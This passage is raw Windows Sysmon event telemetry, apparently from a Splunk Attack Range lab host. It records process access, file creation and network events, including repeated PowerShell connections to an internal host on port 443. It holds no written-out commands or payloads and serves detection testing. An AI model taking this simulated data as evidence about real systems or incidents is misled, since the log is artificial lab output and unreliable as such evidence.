Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.446{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8C4C2C7909451A41A77A7D8DB9625831,SHA256=E13725489E4D05066FD8E3267BA882FCBB651201FD7A594501F0E6A3C69DA9CB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.424{B81B27B7-4E8C-613A-4590-03000000C801}39486740C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:28.246{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084740Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084739Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:28.246{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084738Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035084737Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.246{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035084736Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:28.241{B81B27B7-4E8C-613A-4590-03000000C801}3948C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035084756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.464{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C95F5057641962059E1841CB13140E20,SHA256=29B31EF52D08D4C4B49E7EF01B491FE4FF017DF5414F07D56EC04E2B9C27C0F7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:29.247{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=8C50C4CEAADFE6D1ECB0D4B4430D750B,SHA256=1D0EC171A1117731FCC73A665EFFB9D6A4906E06C0C5A8537E82382F134F7EAE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:29.246{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=5991EBACD7F2DA81F79988389B73CF44,SHA256=B0FAF12D308B7CFB93789E64EF32705BAFC8EB27FBCB73B580C0AC1D4919B292,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:30.479{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BF2BC3FB78E03905272205BA53315F1F,SHA256=54658B551B677F09A1DFBDD359E748A53352282B4E8FD9704CC5A0DE5E79F7F1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:31.542{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D773BBEDEB5D8584ABC33123B301953,SHA256=D94892059267B7F3087935119A4AA9D004CC0C8319DF3024BAF39A2C734E0418,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:31.325{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=87D8A09CB8049725F5826F3AF9DA357F,SHA256=735F522A4D16C3693F811DB2B725230A9BC8337E177B09CB959B5EB7354CCE68,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084765Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:32.843{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084764Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:32.842{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084763Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:32.842{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-1500-00000000C801}1168C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000035084762Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:32.547{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program 
Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=79BFB572C47DFE1234939B20FB97D36E,SHA256=E2DF2770E2B7EA060F6FB89CAF96BB38C6200280CDDC28FD94FA4985D52C7B58,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084761Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.247{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56648-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 354300x800000000000000035084760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:56.115{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56647-false10.0.1.12-8000- 23542300x800000000000000035084766Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:33.578{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8731F255FF9A4A59D6FC77B7DDC7D0DA,SHA256=0279BEF45EAAAB9CD2E00DA1BBFF1B4E03FDA8C9C712330CF36A4761C224E656,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:34.608{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=41583AD5AF5148C811B001086C3E1ED1,SHA256=761DEB7BE1A85078CACB967A502F7398E43764D32220969A406AE4D5C572C95A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:35.639{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D4C80DE6E4576A285302C0FAE61642B3,SHA256=68DA94D83B56C773CAFE0320A5EF3B2E0CD0AAD567AB18BAF6C0472EEE2DD24E,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:36.659{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3767A296A8CB9C7D40D8A60A41B328F8,SHA256=F570D49720F52CC607A933177457C54978994B201B38D41E91544644B44039B6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:36.406{B81B27B7-4012-611D-1100-00000000C801}968NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=3611BC73FF35DD68DCF0FAE874B57B81,SHA256=2A6095F5DA212D23D684FACA0AC081AE4BC631877A020FAE99B7F6A9FFB48120,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 
18:12:36.259{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=F85BFE129494E6F0AD77FAF7EF698121,SHA256=6B0D42AADD0AA10DAF40DADEC86E3FAED814164CAAB7917520BC1D74A0825B63,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:37.673{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1AE1D97EFCD634EAB66A1EE146923661,SHA256=0C0C22AAFAE83376753A264E8652C73D771653A71D4F4E9C1A33E03EC97D902F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:01.259{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56649-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:38.687{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=40FD62F99DC29592B54CFF175383C596,SHA256=1DFCB691005763F36A9E28B05D8C2DF8C508F8C782AAB794E33CBA53285C2682,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 
354300x800000000000000035084774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:02.157{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56650-false10.0.1.12-8000- 23542300x800000000000000035084776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:39.718{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A27E97B7593C1D333525AA79A637BE3F,SHA256=2CA9A9896D969CFE30BECF3AC639C6310E11E7E0F81706C183637FE9CF0FE5B3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:40.740{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D12CFE7CD5552858217D499147093940,SHA256=96AD8F657C791BF9C94D5C05AD066CA344B3AB02AD51274604BF39D5FC08CD47,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:41.759{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=45552B0421B7C01B6A66C0211F7F4E04,SHA256=CD4B8CA2DBCB86DAFBF5EA95090327C0EA9759CF0A420768D25A3B6B2F099949,IMPHASH=00000000000000000000000000000000falsefalse - 
insufficient disk space 23542300x800000000000000035084778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:41.474{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=013580EA2B766CA3EAF2019F5C938730,SHA256=0F13704FB0BD3ACBAE229329F9949B79A0FC5E040674C7AE281CF61D15E16B11,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035084781Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:42.805{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B7521C8748DE25162E8CD09858420BB,SHA256=28E6AB5CAAE5B26A4B8D269555A7AE45C8473B8258396468B74DA966577CCF87,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035084780Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:13:06.281{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56651-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035084791Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.819{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8AF78C03650188A7770CB9F7AD1E3B1,SHA256=15C2C725B447D341911F576924A5642BF20117F5F3F199931D82763CCF912286,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035084790Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.717{B81B27B7-4E9B-613A-4790-03000000C801}61602936C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035084789Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:12:43.573{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4E9B-613A-4790-03000000C801}6160C:\Program 